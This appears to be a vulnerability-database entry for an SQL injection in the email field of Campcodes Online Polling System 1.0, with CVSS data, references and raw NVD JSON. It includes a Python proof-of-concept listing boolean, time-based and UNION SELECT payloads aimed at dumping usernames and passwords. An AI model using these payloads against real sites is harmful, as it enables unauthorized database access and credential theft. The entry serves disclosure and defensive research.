CVE-2025-13557

Description

A vulnerability has been found in Campcodes Online Polling System 1.0. Affected by this issue is some unknown functionality of the file /registeracc.php. The manipulation of the argument email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:campcodes:online_polling_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Campcodes Online Polling System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import sys # CVE-2025-13557 PoC - SQL Injection in Campcodes Online Polling System 1.0 # Target: /registeracc.php email parameter # Author: Security Researcher def exploit_sqli(target_url): """ SQL Injection PoC for CVE-2025-13557 This demonstrates time-based blind SQL injection in email parameter """ # Normal registration request (for reference) normal_data = { 'email': '[email protected]', 'username': 'testuser', 'password': 'testpass123' } # SQL Injection payloads payloads = [ # Boolean-based injection - check if vulnerable "[email protected]' AND 1=1-- -", # Database version extraction via time-based blind injection "[email protected]' AND SLEEP(5)-- -", # Database name extraction (MySQL) "[email protected]' AND (SELECT COUNT(*) FROM mysql.user) > 0-- -", # User table extraction "[email protected]' UNION SELECT NULL,NULL,username,password,NULL FROM users-- -" ] print(f"[*] Target: {target_url}") print(f"[*] Testing SQL Injection vulnerability...\n") for i, payload in enumerate(payloads, 1): print(f"[Payload {i}] {payload}") # Simulate the request (uncomment for actual testing) # data = normal_data.copy() # data['email'] = payload # try: # response = requests.post(target_url, data=data, timeout=10) # print(f"[Response Code] {response.status_code}") # except requests.exceptions.RequestException as e: # print(f"[Error] {e}") print() print("[*] Note: This PoC demonstrates the vulnerability structure.") print("[*] Use sqlmap or manual testing for actual exploitation.") if __name__ == '__main__': if len(sys.argv) > 1: target = sys.argv[1] else: target = 'http://target-site.com/registeracc.php' exploit_sqli(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13557
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13557
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13557/
[4] VulDB https://vuldb.com/cve/CVE-2025-13557
[5] https://github.com/ProgramShowMaker/CVE/issues/3
[6] https://vuldb.com/?ctiid.333324
[7] https://vuldb.com/?id.333324
[8] https://vuldb.com/?submit.696615
[9] https://www.campcodes.com/
[10] https://github.com/ProgramShowMaker/CVE/issues/3

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13557", "sourceIdentifier": "[email protected]", "published": "2025-11-23T17:15:47.383", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Campcodes Online Polling System 1.0. Affected by this issue is some unknown functionality of the file /registeracc.php. The manipulation of the argument email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:campcodes:online_polling_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "B9F9CF24-8D3D-4F78-A405-E6F5139459E3"}]}]}], "references": [{"url": "https://github.com/ProgramShowMaker/CVE/issues/3", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.333324", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.333324", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.696615", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.campcodes.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/ProgramShowMaker/CVE/issues/3", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}